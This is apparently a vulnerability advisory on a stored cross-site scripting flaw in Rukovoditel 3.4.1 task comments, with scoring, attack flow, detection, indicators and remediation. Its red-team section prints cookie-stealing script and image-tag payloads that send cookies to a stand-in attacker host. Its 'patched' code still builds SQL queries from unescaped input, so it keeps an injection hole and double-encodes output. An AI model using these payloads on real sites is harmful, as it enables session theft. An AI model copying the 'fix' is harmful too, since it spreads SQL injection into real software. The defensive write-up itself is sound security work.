CVE-2023-53897
Executive Summary
CVE-2023-53897 is a stored cross-site scripting (XSS) vulnerability in Rukovoditel 3.4.1, a project management application. An authenticated attacker can inject arbitrary JavaScript into project task comments. When other users view the affected task, the malicious script executes in their browser, potentially leading to session hijacking, data theft, or further compromise. The vulnerability is unpatched, and no official fix has been released by the vendor.

Supply Chain & Package Security
This vulnerability is not related to NPM, PyPI, Go, or Ruby packages. It affects a standalone PHP application (Rukovoditel). No supply chain compromise is involved.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- Base Score: 5.4 (Medium)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: Low (PR:L) – attacker must be authenticated
- User Interaction: Required (UI:R) – victim must view the comment
- Scope: Changed (S:C) – impact extends beyond the vulnerable component
- Confidentiality Impact: Low (C:L)
- Integrity Impact: Low (I:L)
- Availability Impact: None (A:N)
Threat Level: Medium. Exploitation requires authentication, but the impact can be significant if an attacker targets an admin user.
Deep Dive & Mechanics
The vulnerability resides in the comment submission functionality for project tasks. Rukovoditel 3.4.1 fails to properly sanitize user input in the comment body. When an authenticated user submits a comment containing HTML or JavaScript, the application stores it in the database without encoding or filtering. When another user views the task, the comment is rendered directly in the browser, allowing the injected script to execute.
Root Cause: Lack of output encoding or input validation on the comment field. The application does not use htmlspecialchars() or similar functions when displaying comments.
Attack Flow:
- Attacker logs in as a regular user.
- Attacker navigates to a project task and adds a comment containing a malicious payload, e.g.,
<script>alert('XSS')</script>. - The comment is stored in the database.
- Victim (e.g., project manager) views the task.
- The malicious script executes in the victim's browser.
Vulnerable vs. Patched Code
Vulnerable Code (Rukovoditel 3.4.1):
// In a file like modules/tasks/comments.php
$comment_text = $_POST['comment'];
// Direct insertion into database without sanitization
$db->query("INSERT INTO comments (task_id, user_id, text) VALUES ($task_id, $user_id, '$comment_text')");
// Later, when displaying:
echo $comment['text']; // No escaping
Patched Code (Hypothetical Fix):
$comment_text = htmlspecialchars($_POST['comment'], ENT_QUOTES, 'UTF-8');
$db->query("INSERT INTO comments (task_id, user_id, text) VALUES ($task_id, $user_id, '$comment_text')");
// When displaying:
echo htmlspecialchars($comment['text'], ENT_QUOTES, 'UTF-8');
The fix requires both input validation (rejecting malicious content) and output encoding (escaping HTML entities). Since no official patch exists, users must implement these changes manually.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- Access to a Rukovoditel 3.4.1 instance with a valid user account.
- A project task to comment on.
Exploit Steps:
- Log in to Rukovoditel.
- Navigate to a project task.
- Submit a comment with the following payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Wait for an admin or other user to view the task.
- The victim's cookies are exfiltrated to the attacker's server.
Alternative Payload (Session Hijacking):
<img src=x onerror="document.location='https://attacker.com/steal?cookie='+document.cookie">
Blue Team (Detection & Hardening)
Detection:
- Monitor for unusual comment submissions containing
<script>,<img onerror>, or other HTML event handlers. - Use WAF rules to block common XSS patterns in POST requests to comment endpoints.
Hardening:
- Apply input validation and output encoding as shown in the patched code section.
- Implement Content Security Policy (CSP) headers to restrict script execution.
- Use HTTP-only cookies to mitigate session theft.
Indicators of Compromise (IOCs)
- Network: Outbound HTTP requests to unknown domains from the Rukovoditel server.
- Logs: Comment entries containing
<script>,<iframe>, oronerrorattributes. - File: Modified comment database entries with suspicious HTML.
- Behavior: Unexpected redirects or pop-ups when viewing project tasks.
Example IOC (Log Entry):
[2025-03-21 10:15:30] User "attacker" added comment to task #42: "<script>fetch('http://malicious.com/steal')</script>"

Remediation & Mitigation
Immediate Actions:
- Disable comments in Rukovoditel until a patch is applied.
- Implement a WAF rule to block XSS patterns in comment submissions.
- Apply input validation and output encoding manually (see patched code section).
Long-Term Fix:
- Upgrade to a patched version if the vendor releases one.
- If no patch is available, consider migrating to an alternative project management tool.
Compensating Controls:
- Use Content Security Policy (CSP) headers to restrict script execution.
- Enable HTTP-only and Secure flags on session cookies.
- Conduct regular security audits of custom PHP applications.
